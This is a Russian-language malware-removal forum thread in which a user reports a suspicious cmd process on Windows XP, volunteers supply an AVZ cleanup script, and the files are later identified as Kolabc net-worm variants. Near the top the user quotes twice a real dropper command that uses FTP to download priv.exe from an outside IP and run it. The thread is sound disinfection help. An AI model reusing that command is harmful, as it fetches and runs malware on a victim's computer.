наверно сидит зараза
в АВЗ в диспетчере процессов нашел запущен cmd
cmd /k echo open 94.28.169.178 9798 >> ii & echo user 1 1 >> ii & echo get priv.exe >> ii & echo bay >> ii & ftp -n -v -s:ii &del ii &priv.exe|
Printable View
наверно сидит зараза
в АВЗ в диспетчере процессов нашел запущен cmd
cmd /k echo open 94.28.169.178 9798 >> ii & echo user 1 1 >> ii & echo get priv.exe >> ii & echo bay >> ii & ftp -n -v -s:ii &del ii &priv.exe|
[CODE]Platform: Windows XP SP1 (WinNT 5.01.2600)[/CODE]
Вы в курсе, что уже давно SP3 вышел.
[URL="http://virusinfo.info/showthread.php?t=7239"]В AVZ -> файл-> Выполнить скрипт[/URL]
[CODE]
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
QuarantineFile('C:\WINDOWS\System32\priv.exe','');
QuarantineFile('C:\WINDOWS\Temp\JET7696.tmp','');
QuarantineFile('C:\WINDOWS\System32\algs.exe','');
DeleteFile('C:\WINDOWS\System32\algs.exe');
DeleteFile('C:\WINDOWS\System32\priv.exe');
DeleteFile('C:\WINDOWS\Temp\JET7696.tmp');
BC_Importall;
BC_DeleteSvc('Srpclossgr');
ExecuteSysClean;
BC_Activate;
RebootWindows(true);
end.
[/CODE]
Компьютер перезагрузится.
Пришлите карантин согласно правил по ссылке [URL="http://virusinfo.info/upload_virus.php?tid=41934"]http://virusinfo.info/upload_virus.php?tid=41934[/URL]
Повторите логи по правилам.
в курсе (
логи после скрипта
есть еще файл в recycler - он не удалялся, удалил токо после снятия атрибутов
заархивировал его - посмотрите?
Давайте. Архив с паролем virus сделайте.
[size="1"][color="#666686"][B][I]Добавлено через 2 минуты[/I][/B][/color][/size]
[URL="http://www.virusinfo.info/showthread.php?t=4491"]"Пофиксите"[/URL] в HijackThis
[CODE]
O2 - BHO: Acronis Popup Blocker - {E24AD748-155E-4254-B674-4EDF86E7E1DF} - (no file)
[/CODE]
Жалобы есть?
этот файл был в автозагрузке.
Сейчас отключено все по мах - работает вроде нормально
Есть одна проблема UserGate периодически грузит проц на 60% - то ли не замечал раньше, то ли ...
не понял куда архив кидать отправляю через запрошенный
гы, сделал rar, не отправляется - хотел извлечь, в zip сделать - уже не извлекается О.О
Статистика проведенного лечения:
[LIST][*]Получено карантинов: [B]1[/B][*]Обработано файлов: [B]10[/B][*]В ходе лечения обнаружены вредоносные программы:
[LIST=1][*] c:\windows\system32\algs.exe - [B]Net-Worm.Win32.Kolabc.gbe[/B] ( DrWEB: Trojan.Packed.162, BitDefender: Packer.RLPack.D )[*] c:\windows\system32\priv.exe - [B]Net-Worm.Win32.Kolabc.ekm[/B] ( BitDefender: Backdoor.Bot.53562 )[/LIST][/LIST]